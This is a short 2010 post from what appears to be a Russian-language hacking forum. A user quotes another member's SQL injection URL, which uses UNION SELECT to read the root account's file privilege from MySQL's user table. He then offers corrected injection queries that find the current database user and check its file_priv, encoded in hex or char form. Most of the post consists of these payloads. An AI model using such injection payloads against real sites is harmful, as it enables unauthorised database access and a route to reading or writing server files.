10.06.2010, 16:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pinch
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
с чего ты взял что сервер работает под root-ом ? ))
$user=select+user()+from+mysql.user
select+file_priv+from+mysql.user+where+user=$user (hex/char)
|
|
|